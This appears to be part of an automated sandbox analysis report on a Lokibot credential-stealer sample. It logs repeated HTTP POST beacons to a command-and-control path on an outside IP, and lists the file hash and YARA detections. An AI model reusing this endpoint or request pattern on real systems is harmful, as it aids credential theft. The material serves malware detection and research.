                  Date: Thu, 25 Nov 2021 17:23:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.349845194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:45.744734049 CET8057OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:45.839463949 CET8059INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  38192.168.2.349851194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:46.879978895 CET8072OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:47.403832912 CET8077INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:46 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  39192.168.2.349855194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:48.864530087 CET8081OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:48.959682941 CET8081INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.349748194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:25.292669058 CET1086OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:25.843662024 CET1086INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:25 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  40192.168.2.349856194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:51.197910070 CET8082OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:53.573219061 CET8083INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  41192.168.2.349857194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:55.025971889 CET8083OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:55.525480032 CET8084INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  42192.168.2.349858194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:56.479058027 CET8085OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:57.486293077 CET8086INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:56 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  43192.168.2.349859194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:59.056904078 CET8087OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:59.210263968 CET8088INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:59 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  44192.168.2.349860194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:00.760570049 CET8088OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:00.858030081 CET8089INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:00 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  45192.168.2.349861194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:02.488225937 CET8090OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:02.585421085 CET8090INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:02 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  46192.168.2.349862194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:04.158303976 CET8091OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:04.667956114 CET8091INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:04 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  47192.168.2.349863194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:06.231426001 CET8092OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:06.343086958 CET8094INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:06 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  48192.168.2.349865194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:07.945362091 CET8100OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:08.055053949 CET8101INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  49192.168.2.349866194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:09.150415897 CET8102OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:09.249567986 CET8102INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.349749194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:26.868772030 CET1087OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:26.965337992 CET1088INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  50192.168.2.349867194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:11.256726027 CET8103OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:11.963359118 CET8104INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:11 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.349750194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:28.257549047 CET1088OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:28.383367062 CET1089INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:28 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.349751194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:29.608133078 CET1090OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:30.439112902 CET1090INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.349752194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:31.618849993 CET1091OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:32.376492023 CET1092INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:31 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.349755194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:35.179306030 CET1115OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:35.268660069 CET1116INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:18:22:06
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase:0x400000
                  File size:301040 bytes
                  MD5 hash:969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:18:22:08
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase:0x400000
                  File size:301040 bytes
                  MD5 hash:969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >